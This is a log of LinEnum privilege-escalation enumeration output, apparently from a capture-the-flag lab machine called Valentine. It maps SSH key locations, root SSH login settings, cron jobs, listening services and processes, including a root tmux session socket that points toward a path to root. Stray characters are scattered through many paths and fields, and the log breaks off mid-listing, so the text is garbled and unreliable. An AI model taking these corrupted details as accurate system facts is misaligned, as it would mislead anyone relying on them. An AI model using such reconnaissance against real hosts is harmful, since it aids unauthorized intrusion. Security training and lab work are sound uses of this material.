/home/hype/.cache/indicator-appmenu/hud-usage-log.sqlite -rw-rw-r-- 1 hype hype 1978 Dec 11 2017 /home/hype/.cache/unity/migration_script.log -rw-r--r-- 1 hype hype 0 Dec 11 2017 /home/hype/.cache/motd.legal-displayed -rw-rw-r-- 1 hype hype 71 Dec 11 2017 /home/h-ype/.cache/indicators/messages/seen-db.keyfile -rw-r--r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.cache/event-sound-cache.tdb.c9052f1b76300a5447f46cc700000004.x86_64-pc-linux-gnu -rw-r--r-- 1 hype hype 26 Dec 11 2017 /home/hype/.dmrc -rw-rw-r-- 1 hype hype 5 Dec 11 2017 /home/hype/.config/user-dirs.locale -rw-rw-r-- 1 hype hype 1152 Dec 11 2017 /home/hype/.config/dconf/user -rw-rw-r-- 1 hype hype 97 Dec 11 2017 /home/hype/.config/nautilus/desktop-metadata -rw-rw-r-- 1 hype hype 3031 Dec 11 2017 /home/hype/.config/Trolltech.conf -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.DB -rw-rw-r-- 1 hype hype 28 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/iamchert -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position..DB -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.DB -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/flintlock -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/position.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/termlist.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseA -rw-rw-r-- 1 hype hype 16384 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.DB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseB -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/record.baseA -rw-rw-r-- 1 hype hype 14 Dec 11 2017 /home/hype/.local/share/zeitgeist/fts.index/postlist.baseB -rw-r--r-- 1 hype hype 19456 Dec 11 2017 /home/hype/.local/share/webkit/icondatabase/WebpageIcons.db -rw-rw-r-- 1 hype hype 0 Dec 11 2017 /hom/e/hype/.local/share/.converted-launchers -rw-rw-r-- 1 hype hype 835 Dec 11 2017 /home/hype/.local/share/gsettings-data-convert -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw-r--r-- 1 root root 39 Dec 13 2017 /home/hype/.tmux.conf -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-card-database.tdb -rw-r--r-- 1 hype hype 12288 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-device-volumes.tdb -rw-r--r-- 1 hype hype 10 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-sink -rw-r--r-- 1 hype hype 18 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-default-source -rw-r--r-- 1 hype hype 696 Dec 11 2017 /home/hype/.pulse/c9052f1b76300a5447f46cc700000004-stream-volumes.tdb -rw-rw-r-- 1 hype hype 132 Dec 11 2017 /home/hype/.gtk-bookmarks -rw-rw-r-- 1 hype hype 17179 Aug 27 15:12 /home/hype/Desktop/output.txt -rwxrwxr-x 1 hype hype 46631 Jul 13 11:54 /home/hype/Desktop/LinEnum.sh -rw-rw-r-- 1 hy0pe hype 33 Dec 13 2017 /home/hype/Desktop/user.txt -rw-rw-r-- 1 hype hype 463 Dec 11 2017 /home/hype/.dbus/session-bus/c9052f1b76300a5447f46cc700000004-0 -rw-r--r-- 1 hype hype 3486 Dec 11 2017 /home/hype/.bashrc [-] Home directory contents: total 144K drwxr-xr-x 21 hype hype 4.0K Feb 5 2018 . drwxr-xr-x 3 root root 4.0K Dec 11 2017 .. -rw------- 1 hype hype 131 Feb 16 2018 .bash_history -rw-r--r-- 1 hype hype 220 Dec 11 2017 .bash_logout -rw-r--r-- 1 hype hype 3.5K Dec 11 2017 .bashrc drwx------ 11 hype hype 4.0K Dec 11 2017 .cache drwx------ 9 hype hype 4.0K Dec 11 2017 .config drwx------ 3 hype hype 4.0K Dec 11 2017 .dbus drwxr-xr-x 2 hype hype 4.0K Aug 27 15:12 Desktop -rw-r--r-- 1 hype hype 26 Dec 11 2017 .dmrc drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Documents drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Downloads drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 .fontconfig drwx------ 3 hype hype 4.0K Dec 11 2017 .gconf drwx------ 4 hype hype 4.0K Dec 11 2017 .gnom1e2 -rw-rw-r-- 1 hype hype 132 Dec 11 2017 .gtk-bookmarks drwx------ 2 hype hype 4.0K Dec 11 2017 .gvfs -rw------- 1 hype hype 636 Dec 11 2017 .ICEauthority drwxr-xr-x 3 hype hype 4.0K Dec 11 2017 .local drwx------ 3 hype hype 4.0K Dec 11 2017 .mission-control drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Music drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Pictures -rw-r--r-- 1 hype hype 675 Dec 11 2017 .profile drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Public drwx------ 2 hype hype 4.0K Dec 11 2017 .pulse -rw------- 1 hype hype 256 Dec 11 2017 .pulse-cookie drwx------ 2 hype hype 4.0K Dec 13 2017 .ssh drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Templates -rw-r--r-- 1 root root 39 Dec 13 2017 .tmux.conf drwxr-xr-x 2 hype hype 4.0K Dec 11 2017 Videos -rw------- 1 hype hype 0 Dec 11 2017 .Xauthority -rw------- 1 hype hype 12K Dec 11 2017 .xsession-errors -rw------- 1 hype hype 9.5K Dec 11 2017 .xsession-errors.old [-] SSH keys/host information found in the following loca2tions: -rw------- 1 hype hype 1766 Dec 13 2017 /home/hype/.ssh/id_rsa -rw------- 1 hype hype 222 Dec 13 2017 /home/hype/.ssh/known_hosts -rw-r--r-- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/id_rsa.pub -rw------- 1 hype hype 397 Dec 13 2017 /home/hype/.ssh/authorized_keys [-] Root is allowed to login via SSH: PermitRootLogin yes ### ENVIRONMENTAL ####################################### [-] Environment information: SHELL=/bin/bash TERM=xterm-256color XDG_SESSION_COOKIE=c9052f1b76300a5447f46cc700000004-1598566069.27898-907383351 SSH_CLIENT=10.10.14.7 47922 22 SSH_TTY=/dev/pts/0 USER=hype PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games MAIL=/var/mail/hype PWD=/home/hype/Desktop LANG=en_US.UTF-8 HOME=/home/hype SHLVL=2 LOGNAME=hype SSH_CONNECTION=10.10.14.7 47922 10.10.10.79 22 LESSOPEN=| /usr/bin/lesspipe %s LESSCLOSE=/usr/bin/lesspipe %s %s _=/usr/bin/env [-] Path information: /usr/local/sbin:/usr/local/bin:/usr3/sbin:/usr/bin:/sbin:/bin:/usr/games drwxr-xr-x 2 root root 4096 Dec 11 2017 /bin drwxr-xr-x 2 root root 4096 Feb 16 2018 /sbin drwxr-xr-x 2 root root 36864 Feb 16 2018 /usr/bin drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/games drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/local/bin drwxr-xr-x 2 root root 4096 Apr 25 2012 /usr/local/sbin drwxr-xr-x 2 root root 12288 Feb 16 2018 /usr/sbin [-] Available shells: # /etc/shells: valid login shells /bin/sh /bin/dash /bin/bash /bin/rbash /usr/bin/tmux [-] Current umask value: 0002 u=rwx,g=rwx,o=rx [-] umask value as specified in /etc/login.defs: UMASK 022 [-] Password and storage information: PASS_MAX_DAYS 99999 PASS_MIN_DAYS 0 PASS_WARN_AGE 7 ENCRYPT_METHOD SHA512 ### JOBS/TASKS ########################################## [-] Cron jobs: -rw-r--r-- 1 root root 722 Apr 2 2012 /etc/crontab /etc/cron.d: total 28 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr4-xr-x 132 root root 12288 Aug 27 14:11 .. -rw-r--r-- 1 root root 288 Jun 20 2010 anacron -rw-r--r-- 1 root root 544 Feb 13 2017 php5 -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.daily: total 84 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rwxr-xr-x 1 root root 311 Jun 20 2010 0anacron -rwxr-xr-x 1 root root 633 Jul 15 2016 apache2 -rwxr-xr-x 1 root root 219 Apr 10 2012 apport -rwxr-xr-x 1 root root 15399 Apr 20 2012 apt -rwxr-xr-x 1 root root 502 Mar 31 2012 bsdmainutils -rwxr-xr-x 1 root root 256 Apr 12 2012 dpkg -rwxr-xr-x 1 root root 372 Oct 4 2011 logrotate -rwxr-xr-x 1 root root 1365 Mar 31 2012 man-db -rwxr-xr-x 1 root root 606 Aug 17 2011 mlocate -rwxr-xr-x 1 root root 249 Apr 8 2012 passwd -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder -rwxr-xr-x 1 root root 2417 Jul 1 2011 popularity-contest -rwxr-xr-x 1 root root 2947 Apr 2 2012 standard -rwxr-xr-5x 1 root root 214 Apr 19 2012 update-notifier-common /etc/cron.hourly: total 20 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.monthly: total 24 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rwxr-xr-x 1 root root 313 Jun 20 2010 0anacron -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder /etc/cron.weekly: total 32 drwxr-xr-x 2 root root 4096 Apr 25 2012 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. -rwxr-xr-x 1 root root 312 Jun 20 2010 0anacron -rwxr-xr-x 1 root root 730 Dec 30 2011 apt-xapian-index -rwxr-xr-x 1 root root 907 Mar 31 2012 man-db -rw-r--r-- 1 root root 102 Apr 2 2012 .placeholder [-] Crontab contents: # /etc/crontab: system-wide crontab # Unlike any other crontab you don't have to run the `crontab' # command to install the new version when you edit this file # and files 6in /etc/cron.d. These files also have username fields, # that none of the other crontabs do. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # m h dom mon dow user command 17 * * * * root cd / && run-parts --report /etc/cron.hourly 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) # [-] Anacron jobs and associated file permissions: -rw-r--r-- 1 root root 395 Jun 20 2010 /etc/anacrontab # /etc/anacrontab: configuration file for anacron # See anacron(8) and anacrontab(5) for details. SHELL=/bin/sh PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin # These replace cron's entries 1 5 cron.daily nice run-parts --report /etc/cron.daily 7 10 cron.weekly nice run-parts --report /etc/cr7on.weekly @monthly 15 cron.monthly nice run-parts --report /etc/cron.monthly [-] When were jobs last executed (/var/spool/anacron contents): total 20 drwxr-xr-x 2 root root 4096 Dec 11 2017 . drwxr-xr-x 8 root root 4096 Apr 25 2012 .. -rw------- 1 root root 9 Aug 27 14:43 cron.daily -rw------- 1 root root 9 Aug 27 14:43 cron.monthly -rw------- 1 root root 9 Aug 27 14:43 cron.weekly ### NETWORKING ########################################## [-] Network and IP info: eth0 Link encap:Ethernet HWaddr 00:50:56:b9:d0:09 inet addr:10.10.10.79 Bcast:10.10.10.255 Mask:255.255.255.0 inet6 addr: dead:beef::b881:fd57:25a3:d78f/64 Scope:Global inet6 addr: dead:beef::250:56ff:feb9:d009/64 Scope:Global inet6 addr: fe80::250:56ff:feb9:d009/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:599284 errors:0 dropped:0 overruns:0 frame:0 TX packets:420050 errors:0 dropp8ed:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:99816521 (99.8 MB) TX bytes:100816041 (100.8 MB) lo Link encap:Local Loopback inet addr:127.0.0.1 Mask:255.0.0.0 inet6 addr: ::1/128 Scope:Host UP LOOPBACK RUNNING MTU:16436 Metric:1 RX packets:745 errors:0 dropped:0 overruns:0 frame:0 TX packets:745 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 RX bytes:142703 (142.7 KB) TX bytes:142703 (142.7 KB) [-] ARP history: ? (10.10.10.2) at 00:50:56:b9:f9:ab [ether] on eth0 [-] Nameserver(s): nameserver 8.8.8.8 [-] Default route: default 10.10.10.2 0.0.0.0 UG 100 0 0 eth0 [-] Listening TCP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:22 0.0.0.0:* 9 LISTEN - tcp 0 0 127.0.0.1:631 0.0.0.0:* LISTEN - tcp6 0 0 :::80 :::* LISTEN - tcp6 0 0 :::22 :::* LISTEN - tcp6 0 0 ::1:631 :::* LISTEN - tcp6 0 0 :::443 :::* LISTEN - [-] Listening UDP: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name udp 0 0 0.0.0.0:55806 0.0.0.0:* - udp 0 0 0.0.0.0:5353 0.0.0.0:* - udp6 0 0 :::48082 :::* - udp6 0 0 :::5353 : :::* - ### SERVICES ############################################# [-] Running processes: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND root 1 0.0 0.2 24508 2420 ? Ss 14:11 0:00 /sbin/init root 2 0.0 0.0 0 0 ? S 14:11 0:00 [kthreadd] root 3 0.0 0.0 0 0 ? S 14:11 0:01 [ksoftirqd/0] root 4 0.0 0.0 0 0 ? S 14:11 0:01 [kworker/0:0] root 5 0.0 0.0 0 0 ? S 14:11 0:00 [kworker/u:0] root 6 0.0 0.0 0 0 ? S 14:11 0:00 [migration/0] root 7 0.0 0.0 0 0 ? S 14:11 0:00 [watchdog/0] root 8 0.0 0.0 0 0 ? S< 14:11 0:00 [cpuset] root 9 0.0 0.0 0 0 ? S< 14:11 0:00 [khelper] root 10 0.0 0.0 0 0 ? S 14:11; 0:00 [kdevtmpfs] root 11 0.0 0.0 0 0 ? S< 14:11 0:00 [netns] root 12 0.0 0.0 0 0 ? S 14:11 0:00 [sync_supers] root 13 0.0 0.0 0 0 ? S 14:11 0:00 [bdi-default] root 14 0.0 0.0 0 0 ? S< 14:11 0:00 [kintegrityd] root 15 0.0 0.0 0 0 ? S< 14:11 0:00 [kblockd] root 16 0.0 0.0 0 0 ? S< 14:11 0:00 [ata_sff] root 17 0.0 0.0 0 0 ? S 14:11 0:00 [khubd] root 18 0.0 0.0 0 0 ? S< 14:11 0:00 [md] root 19 0.0 0.0 0 0 ? S 14:11 0:00 [kworker/u:1] root 21 0.0 0.0 0 0 ? S 14:11 0:00 [khungtaskd] root 22 0.0 0.0 0 0 ? S 14:11 0:00 [kswapd0] root 23 0.0 0.0 0 0 ? SN 14:11 0:00 [ksmd] root 24 0.0 0.0 0 0 ? SN 14:11 0:00 <[khugepaged] root 25 0.0 0.0 0 0 ? S 14:11 0:00 [fsnotify_mark] root 26 0.0 0.0 0 0 ? S 14:11 0:00 [ecryptfs-kthrea] root 27 0.0 0.0 0 0 ? S< 14:11 0:00 [crypto] root 35 0.0 0.0 0 0 ? S< 14:11 0:00 [kthrotld] root 37 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_0] root 38 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_1] root 60 0.0 0.0 0 0 ? S< 14:11 0:00 [devfreq_wq] root 161 0.0 0.0 0 0 ? S 14:11 0:00 [scsi_eh_2] root 164 0.0 0.0 0 0 ? S< 14:11 0:00 [vmw_pvscsi_wq_2] root 218 0.0 0.0 0 0 ? S 14:11 0:00 [jbd2/sda1-8] root 219 0.0 0.0 0 0 ? S< 14:11 0:00 [ext4-dio-unwrit] root 303 0.0 0.0 17356 636 ? S 14:11 0:00 upstart-udev-bridge --daemon root 310 0=.0 0.1 21876 1676 ? Ss 14:11 0:00 /sbin/udevd --daemon syslog 491 0.0 0.1 249464 1540 ? Sl 14:11 0:00 rsyslogd -c5 root 524 0.0 0.1 21872 1204 ? S 14:11 0:00 /sbin/udevd --daemon root 525 0.0 0.1 21872 1156 ? S 14:11 0:00 /sbin/udevd --daemon 102 528 0.0 0.1 24076 1260 ? Ss 14:11 0:00 dbus-daemon --system --fork --activation=upstart root 552 0.0 0.3 79036 3204 ? Ss 14:11 0:00 /usr/sbin/modem-manager root 563 0.0 0.1 21180 1716 ? Ss 14:11 0:00 /usr/sbin/bluetoothd avahi 572 0.0 0.1 32300 1788 ? S 14:11 0:00 avahi-daemon: running [Valentine.local] avahi 573 0.0 0.0 32172 468 ? S 14:11 0:00 avahi-daemon: chroot helper root 579 0.0 0.0 0 0 ? S< 14:11 0:00 [krfcommd] root 580 0.0 0.3 104088 3804 ? Ss 14:11 0:00 /usr/sbin/cupsd -F root 586 0.0 0.6 174440 6516 ? > Ssl 14:11 0:00 NetworkManager root 599 0.0 0.3 203500 3896 ? Sl 14:11 0:00 /usr/lib/policykit-1/polkitd --no-debug root 604 0.0 0.0 0 0 ? S< 14:11 0:00 [kpsmoused] root 704 0.0 0.0 15180 392 ? S 14:11 0:00 upstart-socket-bridge --daemon root 847 0.0 0.0 0 0 ? S 14:11 0:00 [flush-8:0] root 903 0.0 0.2 49952 2860 ? Ss 14:11 0:00 /usr/sbin/sshd -D root 992 0.0 0.0 19976 976 tty4 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty4 root 1001 0.0 0.0 19976 972 tty5 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty5 root 1005 0.0 0.1 26416 1676 ? Ss 14:11 0:01 /usr/bin/tmux -S /.devs/dev_sess <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<&l?t;<<<<<< root 1009 0.0 0.4 20652 4584 pts/13 Ss+ 14:11 0:00 -bash root 1018 0.0 0.0 19976 968 tty2 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty2 root 1021 0.0 0.0 19976 976 tty3 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty3 root 1023 0.0 0.0 19976 972 tty6 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty6 root 1048 0.0 0.0 4452 820 ? Ss 14:11 0:00 acpid -c /etc/acpi/events -s /var/run/acpid.socket root 1050 0.0 0.1 19104 1036 ? Ss 14:11 0:00 cron whoopsie 1052 0.0 0.4 202412 4856 ? Ssl 14:11 0:00 whoopsie daemon 1053 0.0 0.0 16900 380 ? Ss 14:11 0:00 atd root 1089 0.0 0.4 162284 4320 ? Sl 14:11 0:02 /usr/bin/vmtoolsd root 1227 0.0 1.0 113124 10972 ? Ss 14:11 0:00 /usr/sbin/apache2 -k start root 1439 0.0 0.0 19976 976 tty1 Ss+ 14:11 0:00 /sbin/getty -8 38400 tty1 root 1592 0.0@ 1.0 66916 10296 ? S 14:11 0:00 /usr/lib/vmware-vgauth/VGAuthService -s root 1627 0.0 0.5 510124 5468 ? Sl 14:11 0:01 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost www-data 1965 0.3 0.8 113900 8808 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1966 0.3 0.8 113900 8692 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1969 0.3 0.8 113900 8848 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1970 0.3 0.8 113900 8816 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1971 0.3 0.8 113900 8692 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1972 0.3 0.8 113900 8824 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1973 0.3 0.8 113900 8832 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1974 0.3 0.8 113900 8840 ? S 14:43 0:05 /usr/sbin/apache2 -k start www-data 1981 0.3 0.8 113900 8684 ? S 14:43 0:05 /usr/sbinA/apache2 -k start www-data 2437 0.2 0.8 113900 8768 ? S 14:52 0:03 /usr/sbin/apache2 -k start root 2470 0.0 0.0 0 0 ? S 15:06 0:00 [kworker/0:2] root 2473 0.0 0.3 92220 3972 ? Ss 15:07 0:00 sshd: hype [priv] root 2476 0.0 0.3 584296 3828 ? Sl 15:07 0:00 /usr/sbin/console-kit-daemon --no-daemon hype 2684 0.0 0.1 92220 1668 ? S 15:07 0:00 sshd: hype@pts/0 hype 2685 0.0 0.8 31640 8752 pts/0 Ss 15:07 0:00 -bash root 2805 0.0 0.0 0 0 ? S 15:11 0:00 [kworker/0:1] hype 2814 0.0 0.1 17080 1976 pts/0 S+ 15:12 0:00 /bin/bash ./LinEnum.sh -t hype 2815 0.0 0.1 17212 1648 pts/0 S+ 15:12 0:00 /bin/bash ./LinEnum.sh -t hype 2816 0.0 0.0 11356 664 pts/0 S+ 15:12 0:00 tee -a hype 3219 0.0 0.1 17212 1328 pts/0 S+ 15:13 0:00 /bin/bash ./LinEnum.sh -t hype 3220 0.0 0.1 22352 1276 pts/0 B R+ 15:13 0:00 ps aux [-] Process binaries and associated permissions (from above list): 936K -rwxr-xr-x 1 root root 933K Apr 3 2012 /bin/bash 32K -rwxr-xr-x 1 root root 32K Mar 29 2012 /sbin/getty 160K -rwxr-xr-x 1 root root 160K Apr 16 2012 /sbin/init 136K -rwxr-xr-x 1 root root 135K Apr 5 2012 /sbin/udevd 416K -rwxr-xr-x 1 root root 413K Feb 13 2012 /usr/bin/tmux 44K -rwxr-xr-x 1 root root 44K Dec 2 2015 /usr/bin/vmtoolsd 16K -rwxr-xr-x 1 root root 15K Jan 6 2012 /usr/lib/policykit-1/polkitd 784K -rwxr-xr-x 4 root root 783K Dec 11 2017 //usr/lib/vmware-caf/pme/bin/ManagementAgentHost 0 lrwxrwxrwx 1 root root 37 Dec 11 2017 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader 0 lrwxrwxrwx 1 root root 34 Jul 15 2016 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2 856K -rwxr-xr-x 1 root root 856K Mar 21 2012 /usr/sbin/bluetoothd 144K -rwxr-xr-x 1 root root 141K Feb 25 2012 /usr/sbin/console-kit-daemon 436K -rwxr-xr-xC 1 root root 434K Apr 9 2012 /usr/sbin/cupsd 388K -rwxr-xr-x 1 root root 388K Mar 24 2012 /usr/sbin/modem-manager 508K -rwxr-xr-x 1 root root 505K Aug 11 2016 /usr/sbin/sshd [-] /etc/init.d/ binary permissions: total 196 drwxr-xr-x 2 root root 4096 Feb 16 2018 . drwxr-xr-x 132 root root 12288 Aug 27 14:11 .. lrwxrwxrwx 1 root root 21 Dec 11 2017 acpid -> /lib/init/upstart-job -rwxr-xr-x 1 root root 652 Jan 4 2010 acpi-support lrwxrwxrwx 1 root root 21 Dec 11 2017 alsa-restore -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 alsa-store -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 anacron -> /lib/init/upstart-job -rwxr-xr-x 1 root root 7621 Feb 6 2012 apache2 -rwxr-xr-x 1 root root 4596 Apr 12 2012 apparmor lrwxrwxrwx 1 root root 21 Dec 11 2017 apport -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 atd -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 Davahi-daemon -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 bluetooth -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2444 Apr 14 2012 bootlogd -rwxr-xr-x 1 root root 2125 Mar 1 2011 brltty lrwxrwxrwx 1 root root 21 Dec 11 2017 console-setup -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 cron -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 cups -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 dbus -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 dmesg -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1242 Dec 13 2011 dns-clean lrwxrwxrwx 1 root root 21 Dec 11 2017 failsafe-x -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 friendly-recovery -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1105 Apr 17 2012 grub-common -rwxr-xr-x 1 root root 1329 Apr 14 2012 halt lrwxrwxrwx 1 root root 21 Dec 11 2017 hostname -> /lib/inEit/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 hwclock -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 hwclock-save -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 irqbalance -> /lib/init/upstart-job -rwxr-xr-x 1 root root 1893 Apr 18 2012 kerneloops -rwxr-xr-x 1 root root 1293 Apr 14 2012 killprocs -rw-r--r-- 1 root root 0 Apr 25 2012 .legacy-bootordering lrwxrwxrwx 1 root root 21 Dec 11 2017 lightdm -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 modemmanager -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 module-init-tools -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2797 Feb 13 2012 networking lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface-container -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-interface-security -> /lib/iFnit/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 network-manager -> /lib/init/upstart-job -rwxr-xr-x 1 root root 882 Apr 14 2012 ondemand -rwxr-xr-x 1 root root 1685 Jan 24 2012 open-vm-tools lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-log -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-splash -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-stop -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 plymouth-upstart-bridge -> /lib/init/upstart-job -rwxr-xr-x 1 root root 561 Feb 4 2011 pppd-dns lrwxrwxrwx 1 root root 21 Dec 11 2017 procps -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2180 Apr 11 2012 pulseaudio -rwxr-xr-x 1 root root 8635 Apr 14 2012 rc -rwxr-xr-x 1 root root 801 Apr 14 2012 rc.local -rwxr-xr-x 1 root root 117 Apr 14 2012 rcS -rw-r--r-- 1 root root 2427 AprG 14 2012 README -rwxr-xr-x 1 root root 639 Apr 14 2012 reboot lrwxrwxrwx 1 root root 21 Dec 11 2017 resolvconf -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 rfkill-restore -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 rfkill-store -> /lib/init/upstart-job -rwxr-xr-x 1 root root 4395 Nov 8 2011 rsync lrwxrwxrwx 1 root root 21 Dec 11 2017 rsyslog -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2344 Dec 4 2011 saned -rwxr-xr-x 1 root root 4321 Apr 14 2012 sendsigs lrwxrwxrwx 1 root root 21 Dec 11 2017 setvtrgb -> /lib/init/upstart-job -rwxr-xr-x 1 root root 590 Apr 14 2012 single -rw-r--r-- 1 root root 4304 Apr 14 2012 skeleton -rwxr-xr-x 1 root root 2107 May 15 2011 speech-dispatcher -rwxr-xr-x 1 root root 4371 Aug 11 2016 ssh -rwxr-xr-x 1 root root 567 Apr 14 2012 stop-bootlogd -rwxr-xr-x 1 root root 1143 Apr 14 2012 stop-bootlogd-single -rwxr-xr-x 1 root root 700 Oct 26 2011 suHdo srw-rw---- 1 root root 0 Dec 13 2017 test -rwxr-xr-x 1 root root 409 Dec 13 2017 tmuxer lrwxrwxrwx 1 root root 21 Dec 11 2017 udev -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udev-fallback-graphics -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udev-finish -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udevmonitor -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 udevtrigger -> /lib/init/upstart-job lrwxrwxrwx 1 root root 21 Dec 11 2017 ufw -> /lib/init/upstart-job -rwxr-xr-x 1 root root 2800 Apr 14 2012 umountfs -rwxr-xr-x 1 root root 2211 Apr 14 2012 umountnfs.sh -rwxr-xr-x 1 root root 